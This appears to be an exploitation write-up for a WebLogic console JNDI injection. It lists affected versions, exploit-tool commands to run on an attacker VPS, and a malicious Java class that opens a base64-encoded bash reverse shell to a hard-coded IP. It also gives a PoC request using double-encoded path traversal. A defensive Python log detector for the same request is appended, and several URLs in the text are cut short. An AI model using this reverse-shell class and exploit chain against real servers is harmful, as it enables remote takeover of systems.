Affected versions:
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
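Exploitation method 1: blind exploitation (no response echo), reverse shell
1. Tool GitHub address: https://github.com/welk1n/JNDI-Injection-Exploit/releases
Run on the VPS:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "reverse shell command" -A "vpsip"
Listen on a port on the VPS:
PoC:
The reverse shell succeeds.
2. Alternatively, reproduce it directly with the marshalsec-0.0.3-SNAPSHOT-all.jar tool:
Run on the VPS:
Start the JNDI service:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http:
Start the HTTP server:
python -m SimpleHTTPServer 8080
Place the malicious class file in the HTTP directory. The source of evilclass.class is as follows: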
import java.lang.Runtime;
import java.lang.Process;

public class evilclass {
    // The command runs from the constructor, i.e. as soon as the class is instantiated.
    public evilclass() {
        try {
            // Base64-wrapped bash command: decoded by base64 -d and piped into bash -i.
            String commands = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuMTg2LjE0Ni84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}";
            Process pc = Runtime.getRuntime().exec(commands);
            // Block until the spawned process exits.
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        evilclass e = new evilclass();
    }
}
Listen on a port on the VPS:
PoC:
Exploitation method 2: exploitation with response echo
Tool GitHub address: https://github.com/feihong-cs/JNDIExploit/releases/
Run on the VPS:
java -jar JNDIExploit-v1.11.jar -i vpsip
PoC:
GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap:
Host: 192.168.157.189:49163
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*
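Detection side of the request above, as an added example that is not part of the original post: a Python check that flags access-log lines showing the three markers visible in the PoC (double-encoded ../ under /console/, consolejndi.portal, and a JndiBindingHandle argument carrying a JNDI URL). It assumes a Common Log Format access log that records the raw request line; the function names, the extra URL schemes beyond ldap:, and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote
# Markers taken from the PoC request shown on this page.
PORTAL = "consolejndi.portal"
HANDLE = "com.bea.console.handles.jndibindinghandle"
# Generalised beyond the page's ldap: case to other JNDI URL schemes.
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop|dns):", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(target, max_rounds=4):
    """Percent-decode until stable; return (decoded, rounds needed)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(target)
        if nxt == target:
            break
        target, rounds = nxt, rounds + 1
    return target, rounds

def findings(target):
    """Return the indicators present in one request target."""
    decoded, rounds = decode_fully(target)
    low = decoded.lower()
    path = low.split("?", 1)[0]
    hits = []
    if rounds >= 2 and "../" in path:
        hits.append("double-encoded traversal")
    if path.startswith("/console/") and "../" in path and PORTAL in path:
        hits.append("console portal reached via traversal")
    if HANDLE in low and JNDI_URL.search(low):
        hits.append("JndiBindingHandle carrying a JNDI URL")
    return hits

def scan(lines):
    """Map 1-based line number -> indicators for matching log lines."""
    out = {}
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = findings(m.group(1)) if m else []
        if hits:
            out[n] = hits
    return out

# Constructed sample log lines (not captured traffic); hosts are placeholders.
SAMPLE = [
    '198.51.100.7 - - [01/Feb/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3128',
    '198.51.100.7 - - [01/Feb/2021:10:00:09 +0000] "GET /console/css/%252E%252E%252Fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://jndi.example.invalid/a%22) HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Feb/2021:10:02:00 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral HTTP/1.1" 302 0',
]
```

scan(SAMPLE) reports only the second line; an ordinary console login and a direct, untraversed request for consolejndi.portal produce no findings.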